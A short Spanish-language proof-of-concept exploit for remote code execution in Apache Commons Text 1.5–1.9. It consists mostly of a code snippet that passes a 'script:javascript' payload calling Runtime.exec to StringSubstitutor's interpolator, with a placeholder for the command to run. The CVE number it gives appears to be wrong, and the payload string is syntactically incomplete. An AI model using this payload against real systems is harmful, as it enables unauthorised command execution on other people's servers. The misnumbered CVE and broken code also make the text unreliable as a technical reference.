
Exploit de prueba de concepto para CVE-2022-42899, que demuestra ejecución remota de código en Apache Commons Text 1.5-1.9 mediante interpolación de StringSubstitutor con cargas útiles script:javascript.
Apache Common Text desde la versión 1.5 hasta la 1.9 tiene una vulnerabilidad de ejecución remota de código CVE-2022-42899.
final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('<payload to execute RCE>"); // Here you will pass payload which you want to execute such as 'mkdir /tmp/cve-2022-42899'